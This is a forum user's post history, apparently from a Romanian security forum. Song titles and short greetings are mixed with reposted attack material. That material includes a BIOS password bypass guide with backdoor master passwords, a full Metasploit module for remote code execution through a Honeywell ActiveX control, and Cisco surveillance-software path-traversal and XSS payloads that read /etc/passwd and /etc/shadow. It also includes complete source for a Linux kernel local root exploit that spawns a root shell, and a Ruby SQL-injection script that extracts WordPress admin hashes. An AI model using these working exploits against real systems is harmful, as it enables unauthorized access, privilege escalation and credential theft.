
Gonzalez

Active Members
Posts: 1578
Days Won: 10

Everything posted by Gonzalez

  1. http://www.askvg.com/how-to-reset-remove-bypass-a-bios-or-cmos-password/

     BIOS passwords are used to add some extra security to computers. You can either set a password to prevent access to BIOS settings or to prevent the PC from booting. But sometimes this extra security might become a pain when you forget the BIOS password or someone changes your system BIOS password intentionally. But there is no need to worry. There are many known ways to reset / remove / bypass the password:

     - By removing the CMOS battery
     - By using the motherboard jumper
     - By using an MS-DOS command
     - By using software
     - By using a backdoor BIOS password

     Now I'll try to explain each method one by one.

     DISCLAIMER: This information is intended for experienced users. It is not intended for basic users, hackers, or computer thieves. Please do not try any of the following procedures if you are not familiar with computer hardware. We'll not be responsible for the use or misuse of this information, including personal injury, loss of data or hardware damage. So use it at your own risk.

     By Removing the CMOS Battery:
     Almost all motherboards use a small coin-sized CMOS battery to store all BIOS settings along with the password. To reset the password, unplug the PC, open the cabinet and remove the CMOS battery for approx. 15-30 minutes and then put it back. It'll reset all BIOS settings as well as the password and you'll need to re-enter all settings. If it fails, then try to remove the battery for at least one hour.

     By Using the Motherboard Jumper:
     Almost all motherboards contain a jumper that can clear all CMOS settings along with the BIOS password. The location of this jumper varies depending upon the motherboard brand. You should read your motherboard manual to check its location. If you don't have the manual then look for the jumpers near the CMOS battery. Most manufacturers label the jumper as CLR, CLEAR, CLEAR CMOS, etc. When you find the jumper, look carefully. There will be 3 pins and the jumper will be joining the center pin to either the left or the right pin. What you need to do is remove the jumper and join the center pin to the opposite pin, e.g. if the jumper joins the center pin to the left pin, then remove it and join the center pin to the right pin. Now wait for a few seconds and then again remove the jumper and join the center pin to the left pin. Make sure to turn the PC off before opening the cabinet and resetting the jumper.

     By Using an MS-DOS Command:
     This method works only if you have access to the system when it's turned on, because this method requires MS-DOS. Open Command Prompt from the Programs menu and provide the following commands one by one:

         debug
         o 70 2E
         o 71 FF
         quit

     NOTE: The first character in the above commands is the English letter "o" and not the number 0.

     After providing the above commands, restart your system and it should reset the CMOS settings along with the BIOS password. If you are curious to know how it works, then let me explain the above commands: in this method we are using the Debug tool of MS-DOS. The "o" character at the start of these commands outputs the values to I/O ports. The numbers 70 and 71 are the port numbers which are used to access CMOS memory. By providing the FF value we are telling CMOS that there is an invalid checksum, and it resets the CMOS settings as well as the BIOS password.

     By Using Software:
     There are a few software tools which can also reset CMOS settings or the BIOS password or both within a few clicks. But as stated above you should have access to a system which is turned on and should have access to MS-DOS or MS Windows:

     - CmosPwd
     - KillCMOS

     By Using a Backdoor BIOS Password:
     Some BIOS manufacturers put a backdoor password in the BIOS which always works irrespective of what password you have set in the BIOS. It's a master password which is used for testing and troubleshooting purposes.

     AMI BIOS Passwords: A.M.I., AAAMMMIII, AMI?SW, AMI_SW, AMI, BIOS, CONDO, HEWITT RAND, LKWPETER, MI, Oder, PASSWORD

     AWARD BIOS Passwords: 01322222, 589589, 589721, 595595, 598598, ALFAROME, ALLy, aLLy, aLLY, ALLY, aPAf, _award, award, AWARD_SW, AWARD?SW, AWARD SW, AWARD PW, AWKWARD, awkward, BIOSTAR, CONCAT, CONDO, Condo, d8on, djonet, HLT, J64, J256, J262, j332, j322, KDD, Lkwpeter, LKWPETER, PINT, pint, SER, SKY_FOX, SYXZ, syxz, shift + syxz, TTPTHA, ZAAADA, ZBAAACA, ZJAAADC

     PHOENIX BIOS Passwords: BIOS, CMOS, phoenix, PHOENIX

     Misc Common Passwords: ALFAROME, BIOSTAR, biostar, biosstar, CMOS, cmos, LKWPETER, lkwpeter, setup, SETUP, Syxz, Wodj

     Other Manufacturer BIOS Passwords:
     - Biostar - Biostar
     - Compaq - Compaq
     - Dell - Dell
     - Enox - xo11nE
     - Epox - central
     - Freetech - Posterie
     - IWill - iwill
     - Jetway - spooml
     - Packard Bell - bell9
     - QDI - QDI
     - Siemens - SKY_FOX
     - TMC - BIGO
     - Toshiba - Toshiba
     - VOBIS & IBM - merlin

     NOTE: All these passwords are case-sensitive and are changed from time to time by manufacturers.
  2. Good thing it's the Americans' PCs that are infected, where there's a lot of money. -Gonzalez
  3. Metallica - Die Die My Darling.mp3 -Gonzalez
  4. On topic: I've seen what supermen you all are. But you haven't done even as much as those two did, and you still go on about iceman having no teeth in his mouth and appearing on TV. Even if you were ugly, with pimples and so on, you would still have accepted the invitation from Pro TV to be on screen. So stop commenting pointlessly. -Gonzalez
  5. How ugly that game is ^ -Gonzalez
  6. Ice Cube - It Was A Good Day (HD) -Gonzalez
  7. Parazitii - Super Sclavi.mp3 -Gonzalez
  8. Very good post. -Gonzalez
  9. Welcome to RST. -Gonzalez
  10. Welcome to RST. -Gonzalez
  11. Torsten Kanzler - Rock und Roll -Gonzalez
  12. Welcome to RST. -Gonzalez
  13. Chris Liebing & Speedy J (Collabs) @ Lehmann Club,Germany (21.04.2012) -Gonzalez
  14. ##
      # This file is part of the Metasploit Framework and may be subject to
      # redistribution and commercial restrictions. Please see the Metasploit
      # Framework web site for more information on licensing and terms of use.
      # http://metasploit.com/framework/
      ##

      require 'msf/core'

      class Metasploit3 < Msf::Exploit::Remote
        Rank = ExcellentRanking

        include Msf::Exploit::Remote::HttpServer::HTML
        include Msf::Exploit::EXE

        def initialize(info={})
          super(update_info(info,
            'Name'           => "Honeywell HSC Remote Deployer ActiveX Remote Code Execution",
            'Description'    => %q{
              This modules exploits a vulnerability found in the Honewell HSC Remote
              Deployer ActiveX. This control can be abused by using the LaunchInstaller()
              function to execute an arbitrary HTA from a remote location. This module
              has been tested successfully with the HSC Remote Deployer ActiveX installed
              with HoneyWell EBI R410.1.
            },
            'License'        => MSF_LICENSE,
            'Author'         =>
              [
                'juan vazquez'
              ],
            'References'     =>
              [
                [ 'CVE', '2013-0108' ],
                [ 'OSVDB', '90583' ],
                [ 'BID', '58134' ],
                [ 'URL', 'https://community.rapid7.com/community/metasploit/blog/2013/03/11/cve-2013-0108-honeywell-ebi' ],
                [ 'URL', 'http://ics-cert.us-cert.gov/pdf/ICSA-13-053-02.pdf' ]
              ],
            'Payload'        =>
              {
                'Space'           => 2048,
                'StackAdjustment' => -3500
              },
            'DefaultOptions' =>
              {
                'InitialAutoRunScript' => 'migrate -f -k'
              },
            'Platform'       => 'win',
            'Targets'        =>
              [
                [ 'Automatic', {} ]
              ],
            'Privileged'     => false,
            'DisclosureDate' => "Feb 22 2013",
            'DefaultTarget'  => 0))
        end

        def exploit
          @var_exename = rand_text_alpha(5 + rand(5)) + ".exe"
          @dropped_files = [ @var_exename ]
          super
        end

        def on_new_session(session)
          if session.type == "meterpreter"
            session.core.use("stdapi") unless session.ext.aliases.include?("stdapi")
          end

          @dropped_files.delete_if do |file|
            win_file = file.gsub("/", "\\\\")
            if session.type == "meterpreter"
              begin
                wintemp = session.fs.file.expand_path("%TEMP%")
                win_file = "#{wintemp}\\#{win_file}"
                session.shell_command_token(%Q|attrib.exe -r "#{win_file}"|)
                session.fs.file.rm(win_file)
                print_good("Deleted #{file}")
                true
              rescue ::Rex::Post::Meterpreter::RequestError
                print_error("Failed to delete #{win_file}")
                false
              end
            end
          end
        end

        def build_hta(cli)
          var_shellobj     = rand_text_alpha(rand(5)+5);
          var_fsobj        = rand_text_alpha(rand(5)+5);
          var_fsobj_file   = rand_text_alpha(rand(5)+5);
          var_vbsname      = rand_text_alpha(rand(5)+5);
          var_writedir     = rand_text_alpha(rand(5)+5);
          var_origLoc      = rand_text_alpha(rand(5)+5);
          var_byteArray    = rand_text_alpha(rand(5)+5);
          var_writestream  = rand_text_alpha(rand(5)+5);
          var_strmConv     = rand_text_alpha(rand(5)+5);

          p = regenerate_payload(cli);
          exe = generate_payload_exe({ :code => p.encoded })

          # Doing in this way to bypass the ADODB.Stream restrictions on JS,
          # even when executing it as an "HTA" application
          # The encoding code has been stolen from ie_unsafe_scripting.rb
          print_status("Encoding payload into vbs/javascript/hta...");

          # Build the content that will end up in the .vbs file
          vbs_content = Rex::Text.to_hex(%Q|
          Dim #{var_origLoc}, s, #{var_byteArray}
          #{var_origLoc} = SetLocale(1033)
          |)

          # Drop the exe payload into an ansi string (ansi ensured via SetLocale above)
          # for conversion with ADODB.Stream
          vbs_ary = []
          # The output of this loop needs to be as small as possible since it
          # gets repeated for every byte of the executable, ballooning it by a
          # factor of about 80k (the current size of the exe template). In its
          # current form, it's down to about 4MB on the wire
          exe.each_byte do |b|
            vbs_ary << Rex::Text.to_hex("s=s&Chr(#{("%d" % b)})\n")
          end
          vbs_content << vbs_ary.join("")

          # Continue with the rest of the vbs file;
          # Use ADODB.Stream to convert from an ansi string to it's byteArray equivalent
          # Then use ADODB.Stream again to write the binary to file.
          #print_status("Finishing vbs...");
          vbs_content << Rex::Text.to_hex(%Q|
          Dim #{var_strmConv}, #{var_writedir}, #{var_writestream}
          #{var_writedir} = WScript.CreateObject("WScript.Shell").ExpandEnvironmentStrings("%TEMP%") & "\\#{@var_exename}"

          Set #{var_strmConv} = CreateObject("ADODB.Stream")
          #{var_strmConv}.Type = 2
          #{var_strmConv}.Charset = "x-ansi"
          #{var_strmConv}.Open
          #{var_strmConv}.WriteText s, 0
          #{var_strmConv}.Position = 0
          #{var_strmConv}.Type = 1
          #{var_strmConv}.SaveToFile #{var_writedir}, 2

          SetLocale(#{var_origLoc})|)

          hta = <<-EOS
          <script>
            var #{var_shellobj} = new ActiveXObject("WScript.Shell");
            var #{var_fsobj} = new ActiveXObject("Scripting.FileSystemObject");
            var #{var_writedir} = #{var_shellobj}.ExpandEnvironmentStrings("%TEMP%");
            var #{var_fsobj_file} = #{var_fsobj}.OpenTextFile(#{var_writedir} + "\\\\" + "#{var_vbsname}.vbs",2,true);
            #{var_fsobj_file}.Write(unescape("#{vbs_content}"));
            #{var_fsobj_file}.Close();
            #{var_shellobj}.run("wscript.exe " + #{var_writedir} + "\\\\" + "#{var_vbsname}.vbs", 1, true);
            #{var_shellobj}.run(#{var_writedir} + "\\\\" + "#{@var_exename}", 0, false);
            #{var_fsobj}.DeleteFile(#{var_writedir} + "\\\\" + "#{var_vbsname}.vbs");
            window.close();
          </script>
          EOS

          return hta
        end

        def on_request_uri(cli, request)
          agent = request.headers['User-Agent']
          if agent !~ /MSIE \d/
            print_error("Browser not supported: #{agent.to_s}")
            send_not_found(cli)
            return
          end

          uri = ((datastore['SSL']) ? "https://" : "http://")
          uri << ((datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address : datastore['SRVHOST'])
          uri << ":#{datastore['SRVPORT']}"

          print_status("Request received for #{request.uri}");

          if request.uri =~ /\/SystemDisplays\/RemoteInstallWelcome.hta/
            hta = build_hta(cli)
            print_status("Sending HTA application")
            send_response(cli, hta, {'Content-Type'=>'application/hta'})
            return
          end

          html = <<-EOS
          <html>
          <body>
          <object id="RemoteInstaller" classid="clsid:0D080D7D-28D2-4F86-BFA1-D582E5CE4867">
          </object>
          <script>
            RemoteInstaller.LaunchInstaller("#{uri}", "", false);
          </script>
          </body>
          </html>
          EOS

          # we need to handle direct /SystemDisplays/RemoteInstallWelcome.hta requests
          proc = Proc.new do |cli, req|
            on_request_uri(cli, req)
          end
          add_resource({'Path' => "/SystemDisplays/RemoteInstallWelcome.hta", 'Proc' => proc}) rescue nil

          print_status("Sending html")
          send_response(cli, html, {'Content-Type'=>'text/html'})
        end

      end
  15. # Exploit Title: Cisco Video Surveillance Operations Manager Multiple vulnerabilities
      # Google Dork: intitle:"Video Surveillance Operations Manager > Login"
      # Date: 22 Feb 2013 reported to the vendor
      # Exploit Author: Bassem | bassem.co
      # Vendor Homepage: www.cisco.com
      # Version: Version 6.3.2
      # Tested on: Version 6.3.2

      #1- The application is vulnerable to Local file inclusion
      read_log.jsp and read_log.dep do not validate the name and location of the log file; an unauthenticated remote attacker can perform this

      ---------------------------------------------
      read_log.jsp:
      /usr/BWhttpd/root/htdocs/BWT/utils/logs
      from /usr/BWhttpd/logs/<%= logName %>
      ---------------------------------------------

      ---------------------------------------------
      read_log.dep
      <%!
      protected LinkedList getBwhttpdLog( String logName, String theOrder )
      {
          String logPath = "/usr/BWhttpd/logs/";
          String theLog = logPath + logName;
          LinkedList resultList = new LinkedList();
          try {
              BufferedReader in = new BufferedReader(new FileReader(theLog));
              String theLine = "";
              while( (theLine = in.readLine()) != null ) {
                  if( theOrder.indexOf("descending") > -1 ) {
                      resultList.addFirst(theLine);
                  } else {
                      resultList.addLast(theLine);
                  }
              }
      -----------------------------------------------

      POC:
      http://serverip/BWT/utils/logs/read_log.jsp?filter=&log=../../../../../../../../../etc/passwd
      http://serverip/BWT/utils/logs/read_log.jsp?filter=&log=../../../../../../../../../etc/shadow
      #####################################################################

      #2- The application is vulnerable to local file inclusion
      select and display log does not validate the log file names. If an attacker passes /etc/passwd through the HTTP POST request, the system will display it as a log file
      POC: http://serverip/monitor/logselect.php
      #####################################################################

      #3 Cisco Video Surveillance Operations Manager Version 6.3.2 doesn't perform the proper authentication for the management and view console. A remote attacker can gain access to the system and view the attached cameras without authentication
      POC: http://serverip/broadware.jsp
      #####################################################################

      #4 Application is vulnerable to XSS
      The web application doesn't perform validation for the inputs/outputs for many of its pages, so it's vulnerable to XSS attacks
      POC: http://serverip/vsom/index.php/ "/title><script>alert("ciscoxss");</script>

      --
      Best Regards
      Bassem
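The root cause in the first finding above is that `getBwhttpdLog` concatenates the caller-supplied `logName` onto the log directory with no validation, so `../` sequences walk out of `/usr/BWhttpd/logs/`. The hardened version below is an added illustration of the missing check, not Cisco's code; the class name `SafeLogReader`, the `resolveLogPath` helper and the `SAFE_NAME` allowlist are assumptions.

```java
import java.io.BufferedReader;
import java.io.IOException;
import java.nio.charset.StandardCharsets;
import java.nio.file.Files;
import java.nio.file.Path;
import java.nio.file.Paths;
import java.util.LinkedList;
import java.util.regex.Pattern;

public class SafeLogReader {
    // Same base directory as the vulnerable JSP; normalized once so prefix checks are exact.
    private static final Path LOG_DIR = Paths.get("/usr/BWhttpd/logs").toAbsolutePath().normalize();
    // Allowlist (assumed): a bare file name, no separators, no percent/NUL, no spaces.
    private static final Pattern SAFE_NAME = Pattern.compile("[A-Za-z0-9._-]+");

    /** Returns the validated absolute log path, or null when logName must be rejected. */
    static Path resolveLogPath(String logName) {
        if (logName == null || !SAFE_NAME.matcher(logName).matches()) {
            return null;                       // rejects "/", "\\", "../../etc/passwd", "%00"
        }
        if (logName.startsWith(".")) {
            return null;                       // rejects ".", ".." and dotfiles
        }
        // Defense in depth: even after the allowlist, confirm the resolved path
        // is still strictly inside LOG_DIR (symlinks inside the directory are
        // not followed here; use toRealPath() on an existing file if that matters).
        Path resolved = LOG_DIR.resolve(logName).normalize();
        if (!resolved.startsWith(LOG_DIR) || resolved.equals(LOG_DIR)) {
            return null;
        }
        return resolved;
    }

    /** Hardened counterpart of the read_log.dep routine quoted in the advisory. */
    static LinkedList<String> getBwhttpdLog(String logName, String theOrder) throws IOException {
        Path theLog = resolveLogPath(logName);
        if (theLog == null) {
            throw new IllegalArgumentException("invalid log name");
        }
        LinkedList<String> resultList = new LinkedList<>();
        try (BufferedReader in = Files.newBufferedReader(theLog, StandardCharsets.UTF_8)) {
            String theLine;
            while ((theLine = in.readLine()) != null) {
                if (theOrder != null && theOrder.contains("descending")) {
                    resultList.addFirst(theLine);
                } else {
                    resultList.addLast(theLine);
                }
            }
        }
        return resultList;
    }

    public static void main(String[] args) {
        // Constructed probes: the advisory's traversal string plus a few variants and one legitimate name.
        String[] probes = { "access_log", "../../../../../../../../../etc/passwd", "/etc/shadow", "..", "a/b" };
        for (String p : probes) {
            System.out.println(p + " -> " + resolveLogPath(p));   // only "access_log" resolves
        }
    }
}
```

Path validation addresses finding #1 only; the console still needs the authentication check that finding #3 says is missing, since a validated log name is still readable by anyone who can reach the page.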
  16. Local root exploit for Fedora 18 x86_64 using nl_table to leverage the sock_diag_handlers[] vulnerability.

      /*
       * CVE-2013-1763 SOCK_DIAG bug in kernel 3.3-3.8
       * This exploit uses nl_table to jump to a known location
       */
      #include <unistd.h>
      #include <sys/socket.h>
      #include <linux/netlink.h>
      #include <netinet/tcp.h>
      #include <errno.h>
      #include <linux/if.h>
      #include <linux/filter.h>
      #include <string.h>
      #include <stdio.h>
      #include <stdlib.h>
      #include <linux/sock_diag.h>
      #include <linux/inet_diag.h>
      #include <linux/unix_diag.h>
      #include <sys/mman.h>

      typedef int __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred);
      typedef unsigned long __attribute__((regparm(3))) (* _prepare_kernel_cred)(unsigned long cred);

      _commit_creds commit_creds;
      _prepare_kernel_cred prepare_kernel_cred;

      unsigned long sock_diag_handlers, nl_table;

      int __attribute__((regparm(3)))
      kernel_code()
      {
          commit_creds(prepare_kernel_cred(0));
          return -1;
      }

      unsigned long
      get_symbol(char *name)
      {
          FILE *f;
          unsigned long addr;
          char dummy, sym[512];
          int ret = 0;

          f = fopen("/proc/kallsyms", "r");
          if (!f) {
              return 0;
          }

          while (ret != EOF) {
              ret = fscanf(f, "%p %c %s\n", (void **) &addr, &dummy, sym);
              if (ret == 0) {
                  fscanf(f, "%s\n", sym);
                  continue;
              }
              if (!strcmp(name, sym)) {
                  printf("[+] resolved symbol %s to %p\n", name, (void *) addr);
                  fclose(f);
                  return addr;
              }
          }
          fclose(f);

          return 0;
      }

      int main(int argc, char*argv[])
      {
          int fd;
          unsigned family;
          struct {
              struct nlmsghdr nlh;
              struct unix_diag_req r;
          } req;
          char buf[8192];

          if ((fd = socket(AF_NETLINK, SOCK_RAW, NETLINK_SOCK_DIAG)) < 0){
              printf("Can't create sock diag socket\n");
              return -1;
          }

          memset(&req, 0, sizeof(req));
          req.nlh.nlmsg_len = sizeof(req);
          req.nlh.nlmsg_type = SOCK_DIAG_BY_FAMILY;
          req.nlh.nlmsg_flags = NLM_F_ROOT|NLM_F_MATCH|NLM_F_REQUEST;
          req.nlh.nlmsg_seq = 123456;
          req.r.udiag_states = -1;
          req.r.udiag_show = UDIAG_SHOW_NAME | UDIAG_SHOW_PEER | UDIAG_SHOW_RQLEN;

          commit_creds = (_commit_creds) get_symbol("commit_creds");
          prepare_kernel_cred = (_prepare_kernel_cred) get_symbol("prepare_kernel_cred");
          sock_diag_handlers = get_symbol("sock_diag_handlers");
          nl_table = get_symbol("nl_table");

          if(!prepare_kernel_cred || !commit_creds || !sock_diag_handlers || !nl_table){
              printf("some symbols are not available!\n");
              exit(1);
          }

          family = (nl_table - sock_diag_handlers) / 8;
          printf("family=%d\n",family);
          req.r.sdiag_family = family;

          if(family>255){
              printf("nl_table is too far!\n");
              exit(1);
          }

          unsigned long mmap_start, mmap_size;
          mmap_start = 0x100000000;
          mmap_size = 0x200000;
          printf("mmapping at 0x%lx, size = 0x%lx\n", mmap_start, mmap_size);

          if (mmap((void*)mmap_start, mmap_size, PROT_READ|PROT_WRITE|PROT_EXEC,
              MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) == MAP_FAILED) {
              printf("mmap fault\n");
              exit(1);
          }

          memset((void*)mmap_start, 0x90, mmap_size);

          char jump[] = "\x55"                          // push %ebp
                        "\x48\x89\xe5"                  // mov %rsp, %rbp
                        "\x48\xc7\xc0\x00\x00\x00\x00"  // movabs 0x00, %rax
                        "\xff\xd0"                      // call *%rax
                        "\x5d"                          // pop %rbp
                        "\xc3";                         // ret

          unsigned int *asd = (unsigned int*) &jump[7];
          *asd = (unsigned int)kernel_code;

          printf("&kernel_code = %x\n", (unsigned int) kernel_code);

          memcpy( (void*)mmap_start+mmap_size-sizeof(jump), jump, sizeof(jump));

          if ( send(fd, &req, sizeof(req), 0) < 0) {
              printf("bad send\n");
              close(fd);
              return -1;
          }
          printf("uid=%d, euid=%d\n",getuid(), geteuid() );

          if(!getuid())
              system("/bin/sh");
      }
  17. CHRIS LIEBING Live @ CLR London Warehouse Party 24-11-2012 -Gonzalez
  18. The real hackers are coming to TV. Iceman doesn't even know how to speak Romanian. -Gonzalez
  19. Metallica - Leper Messiah.mp3 -Gonzalez
  20. Welcome to RST. -Gonzalez
  21. Iron Maiden - Out of The Shadows -Gonzalez
  22. http://reviews.cnet.com/2300-6452_7-10016134.html LE: damn, it looks way too much like the S3 -Gonzalez
  23. #!/usr/bin/ruby
      #
      # Exploit Title: WordPress LeagueManager Plugin v3.8 SQL Injection
      # Google Dork: inurl:"/wp-content/plugins/leaguemanager/"
      # Date: 13/03/13
      # Exploit Author: Joshua Reynolds
      # Vendor Homepage: http://wordpress.org/extend/plugins/leaguemanager/ (No longer active)
      # Software Link: http://downloads.wordpress.org/plugin/leaguemanager.3.8.zip (No longer active)
      # Version: 3.8
      # Tested on: BT5R1 - Ubuntu 10.04.2 LTS
      # CVE: CVE-2013-1852
      #-----------------------------------------------------------------------------------------
      #Description:
      #
      #An SQL Injection vulnerability exists in the league_id parameter of a function call made
      #by the leaguemanager_export page. This request is processed within the leaguemanager.php:
      #
      #if ( isset($_POST['leaguemanager_export']))
      #  $lmLoader->adminPanel->export($_POST['league_id'], $_POST['mode']);
      #
      #Which does not sanitize for SQL injection, and is passed to the admin/admin.php page
      #into the export( $league_id, $mode ) function which also does not sanitize for SQL injection
      #when making this call: $this->league = $leaguemanager->getLeague($league_id);
      #The information is then echoed to a CSV file that is then provided.
      #
      #Since no authentication is required when making a POST request to this page,
      #i.e. /wp-admin/admin.php?page=leaguemanager-export, the request can be made with no established
      #session.
      #
      #Fix:
      #
      #A possible fix for this would be to cast the league_id to an integer during any
      #of the function calls. The following changes can be made in the leaguemanager.php file:
      #$lmLoader->adminPanel->export((int)$_POST['league_id'], $_POST['mode']);
      #
      #These functions should also not be available to public requests, and thus session handling
      #should also be checked prior to the requests being processed within the admin section.
      #
      #The responsible disclosure processes were distorted by the fact that the author no longer
      #supports his well established plugin, and there are currently no maintainers. After
      #e-mailing the folks over at plugins@wordpress.org they've decided to discontinue the plugin
      #and not patch the vulnerability.
      #
      #The following ruby exploit will retrieve the administrator username and the salted
      #password hash from a given site with the plugin installed:
      #------------------------------------------------------------------------------------------
      #Exploit:

      require 'net/http'
      require 'uri'

      if ARGV.length == 2
        post_params = {
          'league_id' => '7 UNION SELECT ALL user_login,2,3,4,5,6,7,8,'\
                         '9,10,11,12,13,user_pass,15,16,17,18,19,20,21,22,23,24 from wp_users--',
          'mode' => 'teams',
          'leaguemanager_export' => 'Download+File'
        }

        target_url = ARGV[0] + ARGV[1] + "/wp-admin/admin.php?page=leaguemanager-export"

        begin
          resp = Net::HTTP.post_form(URI.parse(target_url), post_params)
        rescue
          puts "Invalid URL..."
        end

        if resp.nil?
          # plain Ruby has no print_error helper; report the failure with puts
          puts "No response received..."
        elsif resp.code != "200"
          puts "Page doesn't exist!"
        else
          admin_login = resp.body.scan(/21\t(.*)\t2.*0\t(.*)\t15/)
          if(admin_login.length > 0)
            puts "Username: #{admin_login[0][0]}"
            puts "Hash: #{admin_login[0][1]}"
            puts "\nNow go crack that with Hashcat :)"
          else
            puts "Username and hash not received. Maybe it's patched?"
          end
        end
      else
        puts "Usage: ruby LeagueManagerSQLI.rb \"http://example.com\" \"/wordpress\""
      end

      #Shout outs: Graycon Group Security Team, Red Hat Security Team, Miss Umer, Tim Williams, Dr. Wu, friends & family.
      #
      #Contact:
      #Mail: infosec4breakfast@gmail.com
      #Blog: infosec4breakfast.com
      #Twitter: @jershmagersh
      #Youtube: youtube.com/user/infosec4breakfast
  24. I don't like it, now that I see the picture. It doesn't impress me at all. -Gonzalez